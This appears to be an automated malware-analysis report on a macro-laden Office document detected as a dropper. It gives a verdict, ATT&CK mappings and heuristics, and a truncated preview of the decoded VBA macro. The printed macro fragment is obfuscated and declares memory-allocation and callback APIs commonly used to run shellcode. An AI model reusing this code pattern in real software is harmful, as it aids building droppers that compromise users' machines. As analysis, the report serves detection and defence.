Verdict: MALICIOUS
Risk Score: 82

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6592057-0, indicating it is a dropper. The presence of VBA macros further supports this, as they are commonly used to download and execute additional malicious content. The macro code itself is heavily obfuscated with comments and uses API calls that suggest it is designed to facilitate the execution of a secondary payload.
Heuristics (3)

- ClamAV: Doc.Dropper.Agent-6592057-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6592057-0
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7886 bytes |

SHA-256: 68e04ae8fdd2951af98d803ea8eec468bee70eeaac9a91c15688f1199834731e

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "acknowledgment"
'Where is my home and where am I going?
'When will I know and how will I know?
#If Win64 Then
'Like a lover turning into a friend
'Where is my home and where am I going?
Public Declare PtrSafe Function italy Lib "kernel32" Alias "HeapCreate" (ByVal piroplasm As LongPtr, ByVal breastfed As LongPtr, ByVal obligatorily As LongPtr) As LongPtr
'And I don't know if it ever will mend
'Why do I feel like I'm in a hurry
Public Declare PtrSafe Function onesided Lib "kernel32" Alias "RemoveDirectoryA" (dendroaspis As LongPtr)
'Like a lover turning into a friend
'Why do I feel like I'm in a hurry
Public Declare PtrSafe Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal competing As LongPtr, ByVal surviving As LongPtr, ByVal rudiments As LongPtr) As LongPtr
'How does the whole thing end?
'I want to believe in something I feel
Public Declare PtrSafe Function nondisposable Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'And I don't know if it ever will mend
'I had a lover who turned into a friend
Public Declare PtrSafe Function biannually Lib "user32" Alias "EndDialog" (ByVal jaded As LongPtr, nResult As LongPtr) As LongPtr
'Like a lover turning into a friend
'I had a lover who turned into a friend
Public Declare PtrSafe Function bloodlessly Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'When will I know and how will I know?
'Will I always be here spinning my wheels
Public Declare PtrSafe Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal hModule As Any, lParam As Any) As LongPtr
'I had a lover who turned into a friend
'When will I marry
Public Declare PtrSafe Function chemoreceptive Lib "user32" Alias "GetDC" (ByVal archtraitor As LongPtr) As LongPtr
'Or does misfortune have a hand in the deal
'Who will be king and who will be beggar?
Public Declare PtrSafe Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (dishevel As Any, perm As Any, ByVal conjugate As LongPtr)
'Why do I cry for nothing sometimes
'I want to believe in a nurturing love
'I want to believe love has a chance to survive
'Why do I cry for nothing sometimes
#Else
'Nothing's for sure except growing old
'And I don't know if it ever will mend
Public Declare Function malted Lib "kernel32" Alias _
"EnumSystemLanguageGroupsA" (ByVal lpEnumFunc As Any, ByVal katmandu As Any, lParam As Any) As Long
'And I don't know if it ever will mend
'Somewhere a heart is getting broken again
Public Declare Function monitive Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'And I don't know if it ever will mend
'When will I know and how will I know?
Public Declare Function bakelite Lib "user32" Alias "GetDC" (chlorambucil As Long) As Long
'And not just a sacrifice
'Who will be king and who will be beggar?
Public Declare Function sledding Lib "kernel32" Alias "RemoveDirectoryA" (defecation As Long)
'I want to believe in something I feel
'Like a lover turning into a friend
Public Declare Function beast Lib "user32" Alias "EndDialog" (ByVal ophicleide As Long, killing As Long) As Long
'When will I know and how will I know?
'The dream to be as one
Public Declare Sub necessary Lib "ntdll" Alias "RtlMoveMemory" (holder As Any, stemwinder As Any, ByVal anthropophagist As Long)
'When will I know and how will I know?
'When will I marry
Public Declare Function italy Lib "kernel32" Alias "HeapCreate" (ByVal unlined As Long, ByVal bedmate As Long, ByVal foulard As Long) As Long
'When will I have this mystery solved?
'Feels like a race and I'm out of time
Public Declare Function jaculate Lib "kernel32" Alias "HeapAlloc" (ByVal acreage As Long, ByVal penguin As Long, ByVal housebreaking As Long) As Long
'I want to believe in a nurturing love
'The dream to be as one
Public Declare Function earless Lib "kernel32" Alias "TlsAlloc" () As Long
'The dream to be as one
'Nothing's for sure except growing old
'Why do I feel like I'm in a hurry
'The dream to be as one
#End If
'I want to believe love has a chance to survive
... (truncated)
```